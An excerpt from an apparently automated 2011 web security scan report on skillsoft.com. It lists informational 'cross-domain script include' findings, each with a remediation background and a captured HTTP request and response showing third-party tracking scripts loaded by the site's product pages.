<td align="center" style="vertical-align:middle"><a href="http://www.scotrail.co.uk/" target="_blank"><img border="0" src="/images/customer_logos/ScotRail_logo.jpg" alt="ScotRail logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.qiagen.com/" target="_blank"><img border="0" src="/images/customer_logos/Qiagen_logo.jpg" alt="Qiagen logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.aegon.com/" target="_blank"><img border="0" src="/images/customer_logos/Aegon_logo.jpg" alt="Aegon logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.elcompanies.com/" target="_blank"><img border="0" src="/images/customer_logos/ELCompanies.jpg" alt="Estee Lauder Companies logo" align="middle">
...[SNIP]...
<div id="privacy">
<a target="_top" href="http://www.truste.org/ivalidate.php?url=www.SkillSoft.com&amp;sealid=102" title="TRUSTe EU Safe Harbor"><img src="/images/truste_seal_eu.gif" alt="TRUSTe EU Safe Harbor" width="165" height="47" />
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4. Cross-domain script include  previous  next
There are 78 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


4.1. http://skillsoft.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: skillsoft.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 46902
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; path=/
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:42:01 GMT
Set-Cookie: BIGipServerSKILLSOFT_COM=748762634.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>


<script language="javascript" type="text/javascript" defer="defer" src="http://ipinvite.iperceptions.com/Invitations/Javascripts/ip_Layer_Invitation_586.aspx" ></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.2. http://skillsoft.com/Books24x7/Product_Information/Collections/AnalystPerspectives.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /Books24x7/Product_Information/Collections/AnalystPerspectives.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Books24x7/Product_Information/Collections/AnalystPerspectives.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 47917
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.3. http://skillsoft.com/Books24x7/Product_Information/Collections/BusinessPro.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /Books24x7/Product_Information/Collections/BusinessPro.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Books24x7/Product_Information/Collections/BusinessPro.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 46441
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.4. http://skillsoft.com/Books24x7/Product_Information/Collections/ElémentsEssentielsFrançais.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /Books24x7/Product_Information/Collections/El.mentsEssentielsFran.ais.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Books24x7/Product_Information/Collections/El.mentsEssentielsFran.ais.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 45860
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.5. http://skillsoft.com/Books24x7/Product_Information/Collections/EngineeringPro.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /Books24x7/Product_Information/Collections/EngineeringPro.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Books24x7/Product_Information/Collections/EngineeringPro.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 46853
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:45:46 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.6. http://skillsoft.com/Books24x7/Product_Information/Collections/ExecBlueprints.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /Books24x7/Product_Information/Collections/ExecBlueprints.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Books24x7/Product_Information/Collections/ExecBlueprints.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 45947
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:46:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.7. http://skillsoft.com/Books24x7/Product_Information/Collections/ExecSummaries.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /Books24x7/Product_Information/Collections/ExecSummaries.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Books24x7/Product_Information/Collections/ExecSummaries.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 48196
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:46:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.8. http://skillsoft.com/Books24x7/Product_Information/Collections/FinancePro.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /Books24x7/Product_Information/Collections/FinancePro.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Books24x7/Product_Information/Collections/FinancePro.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 45418
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:46:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.9. http://skillsoft.com/Books24x7/Product_Information/Collections/German.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /Books24x7/Product_Information/Collections/German.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Books24x7/Product_Information/Collections/German.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 45891
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:46:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.10. http://skillsoft.com/Books24x7/Product_Information/Collections/GovEssentials.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /Books24x7/Product_Information/Collections/GovEssentials.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Books24x7/Product_Information/Collections/GovEssentials.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 44364
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:46:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.11. http://skillsoft.com/Books24x7/Product_Information/Collections/ITIL_B24.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /Books24x7/Product_Information/Collections/ITIL_B24.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Books24x7/Product_Information/Collections/ITIL_B24.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 44654
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:46:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.12. http://skillsoft.com/Books24x7/Product_Information/Collections/ITPro.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /Books24x7/Product_Information/Collections/ITPro.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Books24x7/Product_Information/Collections/ITPro.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 46302
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:47:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.13. http://skillsoft.com/Books24x7/Product_Information/Collections/ManagerSuite.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /Books24x7/Product_Information/Collections/ManagerSuite.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Books24x7/Product_Information/Collections/ManagerSuite.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 45133
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:47:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.14. http://skillsoft.com/Books24x7/Product_Information/Collections/OfficeEssentials.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /Books24x7/Product_Information/Collections/OfficeEssentials.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Books24x7/Product_Information/Collections/OfficeEssentials.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 44579
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:47:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.15. http://skillsoft.com/Books24x7/Product_Information/Collections/Oracle.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /Books24x7/Product_Information/Collections/Oracle.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Books24x7/Product_Information/Collections/Oracle.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 43827
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:47:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.16. http://skillsoft.com/Books24x7/Product_Information/Collections/Spanish.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /Books24x7/Product_Information/Collections/Spanish.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Books24x7/Product_Information/Collections/Spanish.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
